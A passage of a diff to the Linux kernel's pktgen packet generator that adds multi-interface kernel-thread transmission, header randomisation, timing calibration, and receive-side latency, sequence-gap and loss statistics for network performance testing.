We can break out of the loop up to 10us early, so spend the rest of + * it spinning to increase accuracy. + */ + if (start + delay_us > now) { + nanospin((start + delay_us) - now, info); + } } + + + +/* Returns: cycles per micro-second */ static int calc_mhz(void) { struct timeval start, stop; - u32 start_s, elapsed; - + u64 start_s; + u64 t1, t2; + u32 elapsed; + u32 clock_time = 0; + do_gettimeofday(&start); - start_s = cycles(); + start_s = get_cycles(); + /* Spin for 50,000,000 cycles */ do { barrier(); - elapsed = cycles() - start_s; + elapsed = (u32)(get_cycles() - start_s); if (elapsed == 0) return 0; - } while (elapsed < 1000 * 50000); + } while (elapsed < 50000000); do_gettimeofday(&stop); - return elapsed/(stop.tv_usec-start.tv_usec+1000000*(stop.tv_sec-start.tv_sec)); + + t1 = tv_to_us(&start); + t2 = tv_to_us(&stop); + + clock_time = (u32)(t2 - t1); + if (clock_time == 0) { + printk("pktgen: ERROR: clock_time was zero..things may not work right, t1: %u t2: %u ...\n", + (u32)(t1), (u32)(t2)); + return 0x7FFFFFFF; + } + return elapsed / clock_time; } +/* Calibrate cycles per micro-second */ static void cycles_calibrate(void) { int i; for (i = 0; i < 3; i++) { - int res = calc_mhz(); - if (res > pg_cpu_speed) - pg_cpu_speed = res; + u32 res = calc_mhz(); + if (res > pg_cycles_per_us) + pg_cycles_per_us = res; } + + /* Set these up too, only need to calculate these once. 
*/ + pg_cycles_per_ns = pg_cycles_per_us / 1000; + if (pg_cycles_per_ns == 0) { + pg_cycles_per_ns = 1; + } + pg_cycles_per_ms = pg_cycles_per_us * 1000; + + printk("pktgen: cycles_calibrate, cycles_per_ns: %d per_us: %d per_ms: %d\n", + pg_cycles_per_ns, pg_cycles_per_us, pg_cycles_per_ms); } -static struct sk_buff *fill_packet(struct net_device *odev, __u32 saddr) + +/* Increment/randomize headers according to flags and current values + * for IP src/dest, UDP src/dst port, MAC-Addr src/dst + */ +static void mod_cur_headers(struct pktgen_interface_info* info) { + __u32 imn; + __u32 imx; + + /* Deal with source MAC */ + if (info->src_mac_count > 1) { + __u32 mc; + __u32 tmp; + if (info->flags & F_MACSRC_RND) { + mc = net_random() % (info->src_mac_count); + } + else { + mc = info->cur_src_mac_offset++; + if (info->cur_src_mac_offset > info->src_mac_count) { + info->cur_src_mac_offset = 0; + } + } + + tmp = info->src_mac[5] + (mc & 0xFF); + info->hh[11] = tmp; + tmp = (info->src_mac[4] + ((mc >> 8) & 0xFF) + (tmp >> 8)); + info->hh[10] = tmp; + tmp = (info->src_mac[3] + ((mc >> 16) & 0xFF) + (tmp >> 8)); + info->hh[9] = tmp; + tmp = (info->src_mac[2] + ((mc >> 24) & 0xFF) + (tmp >> 8)); + info->hh[8] = tmp; + tmp = (info->src_mac[1] + (tmp >> 8)); + info->hh[7] = tmp; + } + + /* Deal with Destination MAC */ + if (info->dst_mac_count > 1) { + __u32 mc; + __u32 tmp; + if (info->flags & F_MACDST_RND) { + mc = net_random() % (info->dst_mac_count); + } + else { + mc = info->cur_dst_mac_offset++; + if (info->cur_dst_mac_offset > info->dst_mac_count) { + info->cur_dst_mac_offset = 0; + } + } + + tmp = info->dst_mac[5] + (mc & 0xFF); + info->hh[5] = tmp; + tmp = (info->dst_mac[4] + ((mc >> 8) & 0xFF) + (tmp >> 8)); + info->hh[4] = tmp; + tmp = (info->dst_mac[3] + ((mc >> 16) & 0xFF) + (tmp >> 8)); + info->hh[3] = tmp; + tmp = (info->dst_mac[2] + ((mc >> 24) & 0xFF) + (tmp >> 8)); + info->hh[2] = tmp; + tmp = (info->dst_mac[1] + (tmp >> 8)); + info->hh[1] = tmp; + } + + if 
(info->udp_src_min < info->udp_src_max) { + if (info->flags & F_UDPSRC_RND) { + info->cur_udp_src = ((net_random() % (info->udp_src_max - info->udp_src_min)) + + info->udp_src_min); + } + else { + info->cur_udp_src++; + if (info->cur_udp_src >= info->udp_src_max) { + info->cur_udp_src = info->udp_src_min; + } + } + } + + if (info->udp_dst_min < info->udp_dst_max) { + if (info->flags & F_UDPDST_RND) { + info->cur_udp_dst = ((net_random() % (info->udp_dst_max - info->udp_dst_min)) + + info->udp_dst_min); + } + else { + info->cur_udp_dst++; + if (info->cur_udp_dst >= info->udp_dst_max) { + info->cur_udp_dst = info->udp_dst_min; + } + } + } + + if ((imn = ntohl(info->saddr_min)) < (imx = ntohl(info->saddr_max))) { + __u32 t; + if (info->flags & F_IPSRC_RND) { + t = ((net_random() % (imx - imn)) + imn); + } + else { + t = ntohl(info->cur_saddr); + t++; + if (t > imx) { + t = imn; + } + } + info->cur_saddr = htonl(t); + } + + if ((imn = ntohl(info->daddr_min)) < (imx = ntohl(info->daddr_max))) { + __u32 t; + if (info->flags & F_IPDST_RND) { + t = ((net_random() % (imx - imn)) + imn); + } + else { + t = ntohl(info->cur_daddr); + t++; + if (t > imx) { + t = imn; + } + } + info->cur_daddr = htonl(t); + } + + if (info->min_pkt_size < info->max_pkt_size) { + __u32 t; + if (info->flags & F_TXSIZE_RND) { + t = ((net_random() % (info->max_pkt_size - info->min_pkt_size)) + + info->min_pkt_size); + } + else { + t = info->cur_pkt_size + 1; + if (t > info->max_pkt_size) { + t = info->min_pkt_size; + } + } + info->cur_pkt_size = t; + } +}/* mod_cur_headers */ + + +static struct sk_buff *fill_packet(struct net_device *odev, struct pktgen_interface_info* info) { - struct sk_buff *skb; + struct sk_buff *skb = NULL; __u8 *eth; struct udphdr *udph; int datalen, iplen; struct iphdr *iph; - - skb = alloc_skb(pkt_size + 64 + 16, GFP_ATOMIC); + struct pktgen_hdr *pgh = NULL; + + skb = alloc_skb(info->cur_pkt_size + 64 + 16, GFP_ATOMIC); if (!skb) { - sprintf(pg_result, "No memory"); + 
sprintf(info->result, "No memory"); return NULL; } @@ -198,25 +906,30 @@ iph = (struct iphdr *)skb_put(skb, sizeof(struct iphdr)); udph = (struct udphdr *)skb_put(skb, sizeof(struct udphdr)); - /* Copy the ethernet header */ - memcpy(eth, hh, 14); - - datalen = pkt_size - 14 - 20 - 8; /* Eth + IPh + UDPh */ - if (datalen < 0) - datalen = 0; - - udph->source = htons(9); - udph->dest = htons(9); + /* Update any of the values, used when we're incrementing various + * fields. + */ + mod_cur_headers(info); + + memcpy(eth, info->hh, 14); + + datalen = info->cur_pkt_size - 14 - 20 - 8; /* Eth + IPh + UDPh */ + if (datalen < sizeof(struct pktgen_hdr)) { + datalen = sizeof(struct pktgen_hdr); + } + + udph->source = htons(info->cur_udp_src); + udph->dest = htons(info->cur_udp_dst); udph->len = htons(datalen + 8); /* DATA + udphdr */ udph->check = 0; /* No checksum */ iph->ihl = 5; iph->version = 4; - iph->ttl = 3; + iph->ttl = 32; iph->tos = 0; iph->protocol = IPPROTO_UDP; /* UDP */ - iph->saddr = saddr; - iph->daddr = in_aton(pg_dst); + iph->saddr = info->cur_saddr; + iph->daddr = info->cur_daddr; iph->frag_off = 0; iplen = 20 + 8 + datalen; iph->tot_len = htons(iplen); @@ -227,12 +940,14 @@ skb->dev = odev; skb->pkt_type = PACKET_HOST; - if (nfrags <= 0) { - skb_put(skb, datalen); + if (info->nfrags <= 0) { + pgh = (struct pktgen_hdr *)skb_put(skb, datalen); } else { - int frags = nfrags; + int frags = info->nfrags; int i; + pgh = (struct pktgen_hdr*)(((char*)(udph)) + 8); + if (frags > MAX_SKB_FRAGS) frags = MAX_SKB_FRAGS; if (datalen > frags*PAGE_SIZE) { @@ -276,205 +991,980 @@ } } + /* Stamp the time, and sequence number, convert them to network byte order */ + if (pgh) { + pgh->pgh_magic = __constant_htonl(PKTGEN_MAGIC); + do_gettimeofday(&(pgh->timestamp)); + pgh->timestamp.tv_usec = htonl(pgh->timestamp.tv_usec); + pgh->timestamp.tv_sec = htonl(pgh->timestamp.tv_sec); + pgh->seq_num = htonl(info->seq_num); + } + info->seq_num++; + return skb; } -static void 
pg_inject(void) -{ - u32 saddr; - struct net_device *odev; - struct sk_buff *skb; - struct timeval start, stop; - u32 total, idle; - u32 pc, lcount; - char *p = pg_result; - u32 pkt_rate, data_rate; - char rate_unit; - - odev = pg_setup_inject(&saddr); - if (!odev) - return; - - skb = fill_packet(odev, saddr); - if (skb == NULL) - goto out_reldev; - - forced_stop = 0; - idle_acc_hi = 0; - idle_acc_lo = 0; - pc = 0; - lcount = pg_count; - do_gettimeofday(&start); +static void record_latency(struct pktgen_interface_info* info, int latency) { + /* NOTE: Latency can be negative */ + int div = 100; + int diff; + int vl; + int i; + + info->pkts_rcvd_since_clear++; + + if (info->pkts_rcvd_since_clear < 100) { + div = info->pkts_rcvd; + if (info->pkts_rcvd_since_clear == 1) { + info->avg_latency = latency; + } + } + + if ((div + 1) == 0) { + info->avg_latency = 0; + } + else { + info->avg_latency = ((info->avg_latency * div + latency) / (div + 1)); + } + + if (latency < info->min_latency) { + info->min_latency = latency; + } + if (latency > info->max_latency) { + info->max_latency = latency; + } + + /* Place the latency in the right 'bucket' */ + diff = (latency - info->min_latency); + for (i = 0; ilatency_bkts[i]++; + break; + } + } +}/* record latency */ + + +/* Returns < 0 if the skb is not a pktgen buffer. */ +int pktgen_receive(struct sk_buff* skb) { + /* See if we have a pktgen packet */ + if ((skb->len >= (20 + 8 + sizeof(struct pktgen_hdr))) && + (skb->protocol == __constant_htons(ETH_P_IP))) { + + /* It's IP, and long enough, lets check the magic number. + * TODO: This is a hack not always guaranteed to catch the right + * packets. 
+ */ + /*int i; + char* tmp; */ + struct pktgen_hdr* pgh; + /* printk("Length & protocol passed, skb->data: %p, raw: %p\n", + skb->data, skb->h.raw); */ + pgh = (struct pktgen_hdr*)(skb->data + 20 + 8); + /* + tmp = (char*)(skb->data); + for (i = 0; i<60; i++) { + printk("%02hx ", tmp[i]); + if (((i + 1) % 15) == 0) { + printk("\n"); + } + } + printk("\n"); + */ + + if (pgh->pgh_magic == __constant_ntohl(PKTGEN_MAGIC)) { + struct net_device* dev = skb->dev; + struct pktgen_interface_info* info = find_pg_info(dev->ifindex); + + /* Got one! */ + /* TODO: Check UDP checksum ?? */ + __u32 seq = ntohl(pgh->seq_num); + + if (!info) { + return -1; + } + + info->pkts_rcvd++; + info->bytes_rcvd += (skb->len + 4); /* +4 for the checksum */ + + /* Check for out-of-sequence packets */ + if (info->last_seq_rcvd == seq) { + info->dup_rcvd++; + info->dup_since_incr++; + } + else { + __s64 rx = tv_to_us(&(skb->stamp)); + __s64 tx; + struct timeval txtv; + txtv.tv_usec = ntohl(pgh->timestamp.tv_usec); + txtv.tv_sec = ntohl(pgh->timestamp.tv_sec); + tx = tv_to_us(&txtv); + record_latency(info, rx - tx); + + if ((info->last_seq_rcvd + 1) == seq) { + if ((info->peer_multiskb > 1) && + (info->peer_multiskb > (info->dup_since_incr + 1))) { + + info->seq_gap_rcvd += (info->peer_multiskb - + info->dup_since_incr - 1); + } + /* Great, in order...all is well */ + } + else if (info->last_seq_rcvd < seq) { + /* sequence gap, means we dropped a pkt most likely */ + info->seq_gap_rcvd += (seq - info->last_seq_rcvd - 1); + } + else { + info->ooo_rcvd++; /* out-of-order */ + } + + info->dup_since_incr = 0; + } + info->last_seq_rcvd = seq; + kfree_skb(skb); + if (debug > 1) { + printk("done with pktgen_receive, free'd pkt\n"); + } + return 0; + } + } + return -1; /* Let another protocol handle it, it's not for us! 
*/ +}/* pktgen_receive */ + +static void pg_reset_latency_counters(struct pktgen_interface_info* info) { + int i; + info->avg_latency = 0; + info->min_latency = 0x7fffffff; /* largest integer */ + info->max_latency = 0x80000000; /* smallest integer */ + info->pkts_rcvd_since_clear = 0; + for (i = 0; ilatency_bkts[i] = 0; + } +} - for(;;) { - spin_lock_bh(&odev->xmit_lock); - if (!netif_queue_stopped(odev)) { - struct sk_buff *skb2 = skb; - - if (pg_multiskb) - skb2 = skb_copy(skb, GFP_ATOMIC); - else - atomic_inc(&skb->users); - if (!skb2) - goto skip; - if (odev->hard_start_xmit(skb2, odev)) { - kfree_skb(skb2); - if (net_ratelimit()) - printk(KERN_INFO "Hard xmit error\n"); - } - pc++; - } - skip: - spin_unlock_bh(&odev->xmit_lock); +static void pg_clear_counters(struct pktgen_interface_info* info) { + info->seq_num = 1; + info->last_seq_rcvd = 0; + info->idle_acc = 0; + info->sofar = 0; + info->tx_bytes = 0; + info->errors = 0; + info->ooo_rcvd = 0; + info->dup_rcvd = 0; + info->pkts_rcvd = 0; + info->bytes_rcvd = 0; + info->seq_gap_rcvd = 0; + info->non_pg_pkts_rcvd = 0; + + /* This is a bit of a hack, but it gets the dup counters + * in line so we don't have false alarms on dropped pkts. + */ + info->dup_since_incr = info->peer_multiskb - 1; + + pg_reset_latency_counters(info); +} - if (pg_ipg) - nanospin(pg_ipg); - if (forced_stop) - goto out_intr; - if (signal_pending(current)) - goto out_intr; - - if (--lcount == 0) { - if (atomic_read(&skb->users) != 1) { - u32 idle_start, idle; - - idle_start = cycles(); - while (atomic_read(&skb->users) != 1) { - if (signal_pending(current)) - goto out_intr; - schedule(); - } - idle = cycles() - idle_start; - idle_acc_lo += idle; - if (idle_acc_lo < idle) - idle_acc_hi++; - } - break; - } +/* Adds an interface to the thread. The interface will be in + * the stopped queue until started. 
+ */ +static int add_interface_to_thread(struct pktgen_thread_info* pg_thread, + struct pktgen_interface_info* info) { + int rv = 0; + /* grab lock & insert into the stopped list */ + pg_lock(pg_thread, __FUNCTION__); + + if (info->pg_thread) { + printk("pktgen: ERROR: Already assigned to a thread.\n"); + rv = -EBUSY; + goto out; + } + + info->next = pg_thread->stopped_if_infos; + pg_thread->stopped_if_infos = info; + info->pg_thread = pg_thread; + + out: + pg_unlock(pg_thread, __FUNCTION__); + return rv; +} - if (netif_queue_stopped(odev) || current->need_resched) { - u32 idle_start, idle; +/* Set up structure for sending pkts, clear counters, add to rcv hash, + * create initial packet, and move from the stopped to the running + * interface_info list + */ +static int pg_start_interface(struct pktgen_thread_info* pg_thread, + struct pktgen_interface_info* info) { + PG_DEBUG(printk("Entering pg_start_interface..\n")); + pg_setup_inject(info); + + if (!info->odev) { + return -1; + } + + PG_DEBUG(printk("About to clean counters..\n")); + pg_clear_counters(info); + + info->do_run_run = 1; /* Cranke yeself! 
*/ + + info->skb = NULL; + + info->started_at = getCurUs(); + + pg_lock(pg_thread, __FUNCTION__); + { + /* Remove from the stopped list */ + struct pktgen_interface_info* p = pg_thread->stopped_if_infos; + if (p == info) { + pg_thread->stopped_if_infos = p->next; + p->next = NULL; + } + else { + while (p) { + if (p->next == info) { + p->next = p->next->next; + info->next = NULL; + break; + } + p = p->next; + } + } + + info->next_tx_ns = 0; /* Transmit immediately */ + + /* Move to the front of the running list */ + info->next = pg_thread->running_if_infos; + pg_thread->running_if_infos = info; + } + pg_unlock(pg_thread, __FUNCTION__); + PG_DEBUG(printk("Leaving pg_start_interface..\n")); + return 0; +}/* pg_start_interface */ - idle_start = cycles(); - do { - if (signal_pending(current)) - goto out_intr; - if (!netif_running(odev)) - goto out_intr; - if (current->need_resched) - schedule(); - else - do_softirq(); - } while (netif_queue_stopped(odev)); - idle = cycles() - idle_start; - idle_acc_lo += idle; - if (idle_acc_lo < idle) - idle_acc_hi++; - } + +/* set stopped-at timer, remove from running list, do counters & statistics + * NOTE: We do not remove from the rcv hash. + */ +static int pg_stop_interface(struct pktgen_thread_info* pg_thread, + struct pktgen_interface_info* info) { + __u64 total_us; + if (!info->do_run_run) { + printk("pktgen interface: %s is already stopped\n", info->ifname); + return -EINVAL; + } + + info->stopped_at = getCurMs(); + info->do_run_run = 0; + + /* The main worker loop will place it onto the stopped list if needed, + * next time this interface is asked to be re-inserted into the + * list. 
+ */ + + total_us = info->stopped_at - info->started_at; + + { + __u64 idle = pg_div(info->idle_acc, pg_cycles_per_us); + char *p = info->result; + __u64 pps = divremdi3(info->sofar * 1000, pg_div(total_us, 1000), PG_DIV); + __u64 bps = pps * 8 * (info->cur_pkt_size + 4); /* take 32bit ethernet CRC into account */ + + p += sprintf(p, "OK: %llu(c%llu+d%llu) usec, %llu (%dbyte) %llupps %lluMb/sec (%llubps) errors: %llu", + total_us, total_us - idle, idle, + info->sofar, + info->cur_pkt_size + 4, /* Add 4 to account for the ethernet checksum */ + pps, + bps >> 20, bps, info->errors + ); } + return 0; +}/* pg_stop_interface */ - do_gettimeofday(&stop); - total = (stop.tv_sec - start.tv_sec) * 1000000 + - stop.tv_usec - start.tv_usec; +/* Re-inserts 'last' into the pg_thread's list. Calling code should + * make sure that 'last' is not already in the list. + */ +static struct pktgen_interface_info* pg_resort_pginfos(struct pktgen_thread_info* pg_thread, + struct pktgen_interface_info* last, + int setup_cur_if) { + struct pktgen_interface_info* rv = NULL; + + pg_lock(pg_thread, __FUNCTION__); + { + struct pktgen_interface_info* p = pg_thread->running_if_infos; + + if (last) { + if (!last->do_run_run) { + /* If this guy was stopped while 'current', then + * we'll want to place him on the stopped list + * here. + */ + last->next = pg_thread->stopped_if_infos; + pg_thread->stopped_if_infos = last; + } + else { + /* re-insert */ + if (!p) { + pg_thread->running_if_infos = last; + last->next = NULL; + } + else { + /* Another special case, check to see if we should go at the + * front of the queue. 
+ */ + if (p->next_tx_ns > last->next_tx_ns) { + last->next = p; + pg_thread->running_if_infos = last; + } + else { + int inserted = 0; + while (p->next) { + if (p->next->next_tx_ns > last->next_tx_ns) { + /* Insert into the list */ + last->next = p->next; + p->next = last; + inserted = 1; + break; + } + p = p->next; + } + if (!inserted) { + /* place at the end */ + last->next = NULL; + p->next = last; + } + } + } + } + } + + /* List is re-sorted, so grab the first one to return */ + rv = pg_thread->running_if_infos; + if (rv) { + /* Pop him off of the list. We do this here because we already + * have the lock. Calling code just has to be aware of this + * feature. + */ + pg_thread->running_if_infos = rv->next; + } + } + + if (setup_cur_if) { + pg_thread->cur_if = rv; + } + + pg_unlock(pg_thread, __FUNCTION__); + return rv; +}/* pg_resort_pginfos */ + + +void pg_stop_all_ifs(struct pktgen_thread_info* pg_thread) { + struct pktgen_interface_info* next = NULL; + + pg_lock(pg_thread, __FUNCTION__); + if (pg_thread->cur_if) { + /* Move it onto the stopped list */ + pg_stop_interface(pg_thread, pg_thread->cur_if); + pg_thread->cur_if->next = pg_thread->stopped_if_infos; + pg_thread->stopped_if_infos = pg_thread->cur_if; + pg_thread->cur_if = NULL; + } + pg_unlock(pg_thread, __FUNCTION__); + + /* These have their own locking */ + next = pg_resort_pginfos(pg_thread, NULL, 0); + while (next) { + pg_stop_interface(pg_thread, next); + next = pg_resort_pginfos(pg_thread, NULL, 0); + } +}/* pg_stop_all_ifs */ + + +void pg_rem_all_ifs(struct pktgen_thread_info* pg_thread) { + struct pktgen_interface_info* next = NULL; + + /* Remove all interfaces, clean up memory */ + while ((next = pg_thread->stopped_if_infos)) { + int rv = pg_rem_interface_info(pg_thread, next); + if (rv >= 0) { + kfree(next); + } + else { + printk("ERROR: failed to rem_interface: %i\n", rv); + } + } +}/* pg_rem_all_ifs */ + + +void pg_rem_from_thread_list(struct pktgen_thread_info* pg_thread) { + /* Remove 
from the thread list */ + pg_lock_thread_list(__FUNCTION__); + { + struct pktgen_thread_info* tmp = pktgen_threads; + if (tmp == pg_thread) { + pktgen_threads = tmp->next; + } + else { + while (tmp) { + if (tmp->next == pg_thread) { + tmp->next = pg_thread->next; + pg_thread->next = NULL; + break; + } + tmp = tmp->next; + } + } + } + pg_unlock_thread_list(__FUNCTION__); +}/* pg_rem_from_thread_list */ - if (total == 0) total = 1; /* division by zero protection */ - - idle = (((idle_acc_hi<<20)/pg_cpu_speed)<<12)+idle_acc_lo/pg_cpu_speed; - - /* - Rounding errors is around 1% on pkt_rate when total - is just over 100.000. When total is big (total >= - 4.295 sec) pc need to be more than 430 to keep - rounding errors below 1%. Shouldn't be a problem:) - - */ - - if (total < 100000) - pkt_rate = (pc*1000000)/total; - else if (total < 0xFFFFFFFF/1000) /* overflow protection: 2^32/1000 */ - pkt_rate = (pc*1000)/(total/1000); - else if (total < 0xFFFFFFFF/100) - pkt_rate = (pc*100)/(total/10000); - else if (total < 0xFFFFFFFF/10) - pkt_rate = (pc*10)/(total/100000); - else - pkt_rate = (pc/(total/1000000)); - - data_rate = (pkt_rate*pkt_size); - if (data_rate > 1024*1024 ) { /* 10 MB/s */ - data_rate = data_rate / (1024*1024); - rate_unit = 'M'; - } else { - data_rate = data_rate / 1024; - rate_unit = 'K'; - } - - p += sprintf(p, "OK: %u(c%u+d%u) usec, %u (%dbyte,%dfrags) %upps %u%cB/sec", - total, total-idle, idle, - pc, skb->len, skb_shinfo(skb)->nr_frags, - pkt_rate, data_rate, rate_unit - ); - +/* Main loop of the thread. Send pkts. 
+ */ +void pg_thread_worker(struct pktgen_thread_info* pg_thread) { + struct net_device *odev = NULL; + __u64 idle_start = 0; + struct pktgen_interface_info* next = NULL; + u32 next_ipg = 0; + u64 now = 0; /* in nano-seconds */ + u32 tx_since_softirq = 0; + + /* setup the thread environment */ + init_pktgen_kthread(pg_thread, "kpktgend"); + + PG_DEBUG(printk("Starting up pktgen thread: %s\n", pg_thread->name)); + + /* an endless loop in which we are doing our work */ + while (1) { + + /* Re-sorts the list, inserting 'next' (which is really the last one + * we used). It pops the top one off of the queue and returns it. + * Calling code must make sure to re-insert the returned value + */ + next = pg_resort_pginfos(pg_thread, next, 1); + + if (next) { + + odev = next->odev; + + if (next->ipg) { + + now = getRelativeCurNs(); + if (now < next->next_tx_ns) { + next_ipg = (u32)(next->next_tx_ns - now); + + /* Try not to busy-spin if we have larger sleep times. + * TODO: Investigate better ways to do this. + */ + if (next_ipg < 10000) { /* 10 usecs or less */ + nanospin(next_ipg, next); + } + else if (next_ipg < 10000000) { /* 10ms or less */ + pg_udelay(next_ipg / 1000, next); + } + else { + /* fall asleep for a 10ms or more. 
*/ + pg_udelay(next_ipg / 1000, next); + } + } + + /* This is max IPG, this has special meaning of + * "never transmit" + */ + if (next->ipg == 0x7FFFFFFF) { + next->next_tx_ns = getRelativeCurNs() + next->ipg; + continue; + } + } + + if (netif_queue_stopped(odev) || current->need_resched) { + + idle_start = get_cycles(); + + if (!netif_running(odev)) { + pg_stop_interface(pg_thread, next); + continue; + } + if (current->need_resched) { + schedule(); + } + else { + do_softirq(); + tx_since_softirq = 0; + } + next->idle_acc += get_cycles() - idle_start; + + if (netif_queue_stopped(odev)) { + continue; /* Try the next interface */ + } + } + + if (next->last_ok || !next->skb) { + if ((++next->fp_tmp >= next->multiskb ) || (!next->skb)) { + /* build a new pkt */ + if (next->skb) { + kfree_skb(next->skb); + } + next->skb = fill_packet(odev, next); + if (next->skb == NULL) { + printk("ERROR: Couldn't allocate skb in fill_packet.\n"); + schedule(); + next->fp_tmp--; /* back out increment, OOM */ + continue; + } + next->fp++; + next->fp_tmp = 0; /* reset counter */ + /* Not sure what good knowing nr_frags is... 
+ next->nr_frags = skb_shinfo(skb)->nr_frags; + */ + } + atomic_inc(&(next->skb->users)); + } + + spin_lock_bh(&odev->xmit_lock); + if (!netif_queue_stopped(odev)) { + if (odev->hard_start_xmit(next->skb, odev)) { + if (net_ratelimit()) { + printk(KERN_INFO "Hard xmit error\n"); + } + next->errors++; + next->last_ok = 0; + } + else { + next->last_ok = 1; + next->sofar++; + next->tx_bytes += (next->cur_pkt_size + 4); /* count csum */ + } + + next->next_tx_ns = getRelativeCurNs() + next->ipg; + } + else { /* Re-try it next time */ + next->last_ok = 0; + } + + spin_unlock_bh(&odev->xmit_lock); + + if (++tx_since_softirq > pg_thread->max_before_softirq) { + do_softirq(); + tx_since_softirq = 0; + } + + /* If next->count is zero, then run forever */ + if ((next->count != 0) && (next->sofar >= next->count)) { + if (atomic_read(&(next->skb->users)) != 1) { + idle_start = get_cycles(); + while (atomic_read(&(next->skb->users)) != 1) { + if (signal_pending(current)) { + break; + } + schedule(); + } + next->idle_acc += get_cycles() - idle_start; + } + pg_stop_interface(pg_thread, next); + }/* if we're done with a particular interface. */ + + }/* if could find the next interface to send on. */ + else { + /* fall asleep for a bit */ + interruptible_sleep_on_timeout(&(pg_thread->queue), HZ/10); + } + + /* here we are back from sleep, either due to the timeout + (HZ/10, i.e. a tenth of a second), or because we caught a signal.
+ */ + if (pg_thread->terminate || signal_pending(current)) { + /* we received a request to terminate ourself */ + break; + } + }//while true + + /* here we go only in case of termination of the thread */ + + PG_DEBUG(printk("pgthread: %s stopping all Interfaces.\n", pg_thread->name)); + pg_stop_all_ifs(pg_thread); + + PG_DEBUG(printk("pgthread: %s removing all Interfaces.\n", pg_thread->name)); + pg_rem_all_ifs(pg_thread); + + pg_rem_from_thread_list(pg_thread); + + /* cleanup the thread, leave */ + PG_DEBUG(printk("pgthread: %s calling exit_pktgen_kthread.\n", pg_thread->name)); + exit_pktgen_kthread(pg_thread); +} -out_relskb: - kfree_skb(skb); -out_reldev: - dev_put(odev); - return; - -out_intr: - sprintf(pg_result, "Interrupted"); - goto out_relskb; +/* private functions */ +static void kthread_launcher(void *data) { + struct pktgen_thread_info *kthread = data; + kernel_thread((int (*)(void *))kthread->function, (void *)kthread, 0); } +/* create a new kernel thread. Called by the creator. */ +void start_pktgen_kthread(struct pktgen_thread_info *kthread) { + + /* initialize the semaphore: + we start with the semaphore locked. The new kernel + thread will setup its stuff and unlock it. This + control flow (the one that creates the thread) blocks + in the down operation below until the thread has reached + the up() operation. + */ + init_MUTEX_LOCKED(&kthread->startstop_sem); + + /* store the function to be executed in the data passed to + the launcher */ + kthread->function = pg_thread_worker; + + /* create the new thread by running a task through keventd */ + + /* initialize the task queue structure */ + kthread->tq.sync = 0; + INIT_LIST_HEAD(&kthread->tq.list); + kthread->tq.routine = kthread_launcher; + kthread->tq.data = kthread; + + /* and schedule it for execution */ + schedule_task(&kthread->tq); + + /* wait till it has reached the setup_thread routine */ + down(&kthread->startstop_sem); +} + +/* stop a kernel thread.
Called by the removing instance */ +static void stop_pktgen_kthread(struct pktgen_thread_info *kthread) { + PG_DEBUG(printk("pgthread: %s stop_pktgen_kthread.\n", kthread->name)); + + if (kthread->thread == NULL) { + printk("stop_kthread: killing non existing thread!\n"); + return; + } + + /* Stop each interface */ + pg_lock(kthread, __FUNCTION__); + { + struct pktgen_interface_info* tmp = kthread->running_if_infos; + while (tmp) { + tmp->do_run_run = 0; + tmp->next_tx_ns = 0; + tmp = tmp->next; + } + if (kthread->cur_if) { + kthread->cur_if->do_run_run = 0; + kthread->cur_if->next_tx_ns = 0; + } + } + pg_unlock(kthread, __FUNCTION__); + + /* Wait for everything to fully stop */ + while (1) { + pg_lock(kthread, __FUNCTION__); + if (kthread->cur_if || kthread->running_if_infos) { + pg_unlock(kthread, __FUNCTION__); + if (current->need_resched) { + schedule(); + } + mdelay(1); + } + else { + pg_unlock(kthread, __FUNCTION__); + break; + } + } + + /* this function needs to be protected with the big + kernel lock (lock_kernel()). The lock must be + grabbed before changing the terminate + flag and released after the down() call. */ + lock_kernel(); + + /* initialize the semaphore. We lock it here, the + leave_thread call of the thread to be terminated + will unlock it. As soon as we see the semaphore + unlocked, we know that the thread has exited. + */ + init_MUTEX_LOCKED(&kthread->startstop_sem); + + /* We need to do a memory barrier here to be sure that + the flags are visible on all CPUs. + */ + mb(); + + /* set flag to request thread termination */ + kthread->terminate = 1; + + /* We need to do a memory barrier here to be sure that + the flags are visible on all CPUs. + */ + mb(); + kill_proc(kthread->thread->pid, SIGKILL, 1); + + /* block till thread terminated */ + down(&kthread->startstop_sem); + kthread->in_use = 0; + + /* release the big kernel lock */ + unlock_kernel(); + + /* now we are sure the thread is in zombie state. 
We + notify keventd to clean the process up. + */ + kill_proc(2, SIGCHLD, 1); + + PG_DEBUG(printk("pgthread: %s done with stop_pktgen_kthread.\n", kthread->name)); +}/* stop_pktgen_kthread */ + + +/* initialize new created thread. Called by the new thread. */ +void init_pktgen_kthread(struct pktgen_thread_info *kthread, char *name) { + /* lock the kernel. A new kernel thread starts without + the big kernel lock, regardless of the lock state + of the creator (the lock level is *not* inherited) + */ + lock_kernel(); + + /* fill in thread structure */ + kthread->thread = current; + + /* set signal mask to what we want to respond */ + siginitsetinv(&current->blocked, sigmask(SIGKILL)|sigmask(SIGINT)|sigmask(SIGTERM)); + + /* initialise wait queue */ + init_waitqueue_head(&kthread->queue); + + /* initialise termination flag */ + kthread->terminate = 0; + + /* set name of this process (max 15 chars + 0 !) */ + sprintf(current->comm, name); + + /* let others run */ + unlock_kernel(); + + /* tell the creator that we are ready and let him continue */ + up(&kthread->startstop_sem); +}/* init_pktgen_kthread */ + +/* cleanup of thread. Called by the exiting thread. */ +static void exit_pktgen_kthread(struct pktgen_thread_info *kthread) { + /* we are terminating */ + + /* lock the kernel, the exit will unlock it */ + lock_kernel(); + kthread->thread = NULL; + mb(); + + /* Clean up proc file system */ + if (strlen(kthread->fname)) { + remove_proc_entry(kthread->fname, NULL); + } + + /* notify the stop_kthread() routine that we are terminating. */ + up(&kthread->startstop_sem); + /* the kernel_thread that called clone() does a do_exit here. */ + + /* there is no race here between execution of the "killer" and real termination + of the thread (race window between up and do_exit), since both the + thread and the "killer" function are running with the kernel lock held.
